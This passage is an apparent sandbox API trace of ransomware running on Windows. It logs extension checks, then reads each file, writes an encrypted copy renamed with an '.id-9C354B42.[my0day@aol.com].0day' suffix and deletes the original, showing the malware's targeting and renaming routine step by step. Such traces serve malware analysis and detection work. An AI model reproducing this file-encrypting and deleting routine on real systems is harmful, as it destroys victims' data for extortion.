(lpString1=".xls", lpString2=".GIF") returned 1 [0047.431] lstrlenW (lpString=".xlsx") returned 5 [0047.431] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.431] lstrlenW (lpString=".ppt") returned 4 [0047.431] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.431] lstrlenW (lpString=".zip") returned 4 [0047.431] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.431] lstrlenW (lpString=".rar") returned 4 [0047.431] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.431] lstrlenW (lpString=".bz2") returned 4 [0047.431] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.431] lstrlenW (lpString=".7z") returned 3 [0047.431] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.432] lstrlenW (lpString=".dbf") returned 4 [0047.432] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.432] lstrlenW (lpString=".1cd") returned 4 [0047.432] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.432] lstrlenW (lpString=".jpg") returned 4 [0047.432] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.432] lstrlenW (lpString=".doc") returned 4 [0047.432] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.432] lstrlenW (lpString=".docx") returned 5 [0047.432] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.432] lstrlenW (lpString=".pdf") returned 4 [0047.432] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.432] lstrlenW (lpString=".xls") returned 4 [0047.432] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.432] lstrlenW (lpString=".xlsx") returned 5 [0047.432] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.432] lstrlenW (lpString=".ppt") returned 4 [0047.432] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.432] lstrlenW (lpString=".zip") returned 4 [0047.432] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.432] lstrlenW (lpString=".rar") returned 4 [0047.432] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.432] lstrlenW (lpString=".bz2") returned 4 [0047.432] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.432] lstrlenW (lpString=".7z") returned 3 [0047.432] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.432] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.432] lstrlenW (lpString=".dbf") returned 4 [0047.433] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.433] lstrlenW (lpString=".1cd") returned 4 [0047.433] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.433] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.433] lstrlenW (lpString=".jpg") returned 4 [0047.433] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.433] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0047.433] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.433] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=33479) returned 1 [0047.433] CloseHandle (hObject=0x208) returned 1 [0047.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 0x20 [0047.433] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.433] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.434] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.434] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.434] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.434] GetLastError () returned 0x0 [0047.434] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x82c7, lpOverlapped=0x0) returned 1 [0047.436] WriteFile (in: hFile=0x1a8, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x82d0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x82d0, lpOverlapped=0x0) returned 1 [0047.438] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.438] WriteFile (in: hFile=0x1a8, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.438] SetEndOfFile (hFile=0x1a8) returned 1 [0047.438] CloseHandle (hObject=0x1a8) returned 1 [0047.438] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.438] SetEndOfFile (hFile=0x208) returned 1 [0047.439] CloseHandle (hObject=0x208) returned 1 [0047.439] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.439] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\thmbnail.png")) returned 1 [0047.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.440] lstrlenW (lpString=".doc") returned 4 [0047.440] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.440] lstrlenW (lpString=".docx") returned 5 [0047.440] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.440] lstrlenW (lpString=".pdf") returned 4 [0047.440] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.440] lstrlenW (lpString=".xls") returned 4 [0047.440] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.440] lstrlenW (lpString=".xlsx") returned 5 [0047.440] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.440] lstrlenW (lpString=".ppt") returned 4 [0047.440] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.440] lstrlenW (lpString=".zip") returned 4 [0047.440] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.440] lstrlenW (lpString=".rar") returned 4 [0047.440] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.440] lstrlenW (lpString=".bz2") returned 4 [0047.440] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.440] lstrlenW (lpString=".7z") returned 3 [0047.440] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.440] lstrlenW (lpString=".dbf") returned 4 [0047.440] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.440] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.440] lstrlenW (lpString=".1cd") returned 4 [0047.440] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.441] lstrlenW (lpString=".jpg") returned 4 [0047.441] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.441] lstrlenW (lpString=".doc") returned 4 [0047.441] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.441] lstrlenW (lpString=".docx") returned 5 [0047.441] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.441] lstrlenW (lpString=".pdf") returned 4 [0047.441] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.441] lstrlenW (lpString=".xls") returned 4 [0047.441] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.441] lstrlenW (lpString=".xlsx") returned 5 [0047.441] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.441] lstrlenW (lpString=".ppt") returned 4 [0047.441] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.441] lstrlenW (lpString=".zip") returned 4 [0047.441] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.441] lstrlenW (lpString=".rar") returned 4 [0047.441] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.441] lstrlenW (lpString=".bz2") returned 4 [0047.441] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.441] lstrlenW (lpString=".7z") returned 3 [0047.441] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.441] lstrlenW (lpString=".dbf") returned 4 [0047.441] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.441] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.441] lstrlenW (lpString=".1cd") returned 4 [0047.441] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.442] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\THMBNAIL.PNG") returned 77 [0047.442] lstrlenW (lpString=".jpg") returned 4 [0047.442] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.442] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0047.442] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.442] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.445] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1675) returned 1 [0047.445] CloseHandle (hObject=0x208) returned 1 [0047.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 0x20 [0047.445] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.445] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.445] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.445] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0047.646] GetLastError () returned 0x0 [0047.646] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x68b, lpOverlapped=0x0) returned 1 [0047.828] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x690, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x690, lpOverlapped=0x0) returned 1 [0047.829] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.829] WriteFile (in: hFile=0x194, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.830] SetEndOfFile (hFile=0x194) returned 1 [0047.830] CloseHandle (hObject=0x194) returned 1 [0047.830] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.830] SetEndOfFile (hFile=0x208) returned 1 [0047.831] CloseHandle (hObject=0x208) returned 1 [0047.831] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.831] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\preview.gif")) returned 1 [0047.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0047.831] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0047.831] lstrlenW (lpString=".doc") returned 4 [0047.831] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.831] lstrlenW (lpString=".docx") returned 5 [0047.831] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.831] lstrlenW (lpString=".pdf") returned 4 [0047.831] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.831] lstrlenW (lpString=".xls") returned 4 [0047.831] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.831] lstrlenW (lpString=".xlsx") returned 5 [0047.831] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.831] lstrlenW (lpString=".ppt") returned 4 [0047.831] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0047.832] lstrlenW (lpString=".zip") returned 4 [0047.832] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.832] lstrlenW (lpString=".rar") returned 4 [0047.832] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.832] lstrlenW (lpString=".bz2") returned 4 [0047.832] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.832] lstrlenW (lpString=".7z") returned 3 [0047.832] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0047.832] lstrlenW (lpString=".dbf") returned 4 [0047.832] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0047.832] lstrlenW (lpString=".1cd") returned 4 [0047.832] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.832] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\PREVIEW.GIF") returned 74 [0047.832] lstrlenW (lpString=".jpg") returned 4 [0047.832] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.576] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.599] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0048.600] GetLastError () returned 0x0 [0048.600] ReadFile (in: hFile=0x170, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1195f, lpOverlapped=0x0) returned 1 [0048.603] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x11960, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x11960, lpOverlapped=0x0) returned 1 [0048.604] ReadFile (in: hFile=0x170, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0048.604] WriteFile (in: hFile=0x1fc, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.604] SetEndOfFile (hFile=0x1fc) returned 1 [0048.605] CloseHandle (hObject=0x1fc) returned 1 [0048.605] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0048.605] SetEndOfFile (hFile=0x170) returned 1 [0048.606] CloseHandle (hObject=0x170) returned 1 [0048.606] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0048.606] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm")) returned 1 [0048.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0048.606] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0048.606] lstrlenW (lpString=".doc") returned 4 [0048.606] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0048.606] lstrlenW (lpString=".docx") returned 5 [0048.606] lstrcmpiW (lpString1=".docx", lpString2="8.CHM") returned -1 [0048.606] lstrlenW (lpString=".pdf") returned 4 [0048.606] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0048.606] lstrlenW (lpString=".xls") returned 4 [0048.606] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0048.607] lstrlenW (lpString=".xlsx") returned 5 [0048.607] lstrcmpiW (lpString1=".xlsx", lpString2="8.CHM") returned -1 [0048.607] lstrlenW (lpString=".ppt") returned 4 [0048.607] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0048.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0048.607] lstrlenW (lpString=".zip") returned 4 [0048.607] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0048.607] lstrlenW (lpString=".rar") returned 4 [0048.607] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0048.607] lstrlenW (lpString=".bz2") returned 4 [0048.607] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0048.607] lstrlenW (lpString=".7z") returned 3 [0048.607] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0048.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0048.607] lstrlenW (lpString=".dbf") returned 4 [0048.607] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0048.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0048.607] lstrlenW (lpString=".1cd") returned 4 [0048.607] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0048.607] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 73 [0048.607] lstrlenW (lpString=".jpg") returned 4 [0048.607] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0052.044] MoveFileW (lpExistingFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv"), lpNewFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsscenesbackground.wmv.id-9c354b42.[my0day@aol.com].0day")) returned 0 [0052.044] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0052.044] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0052.044] lstrlenW (lpString=".doc") returned 4 [0052.044] lstrcmpiW (lpString1=".doc", lpString2=".wmv") returned -1 [0052.044] lstrlenW (lpString=".docx") returned 5 [0052.044] lstrcmpiW (lpString1=".docx", lpString2="d.wmv") returned -1 [0052.044] lstrlenW (lpString=".pdf") returned 4 [0052.044] lstrcmpiW (lpString1=".pdf", lpString2=".wmv") returned -1 [0052.044] lstrlenW (lpString=".xls") returned 4 [0052.044] lstrcmpiW (lpString1=".xls", lpString2=".wmv") returned 1 [0052.044] lstrlenW (lpString=".xlsx") returned 5 [0052.044] lstrcmpiW (lpString1=".xlsx", lpString2="d.wmv") returned -1 [0052.044] lstrlenW (lpString=".ppt") returned 4 [0052.044] lstrcmpiW (lpString1=".ppt", lpString2=".wmv") returned -1 [0052.044] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0052.044] lstrlenW (lpString=".zip") returned 4 [0052.045] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0052.045] lstrlenW (lpString=".rar") returned 4 [0052.045] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0052.045] lstrlenW (lpString=".bz2") returned 4 [0052.045] lstrcmpiW (lpString1=".bz2", lpString2=".wmv") returned -1 [0052.045] lstrlenW (lpString=".7z") returned 3 [0052.045] lstrcmpiW (lpString1=".7z", lpString2="wmv") returned -1 [0052.045] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsScenesBackground.wmv") returned 77 [0052.045] lstrlenW (lpString=".dbf") returned 4 [0052.045] lstrcmpiW 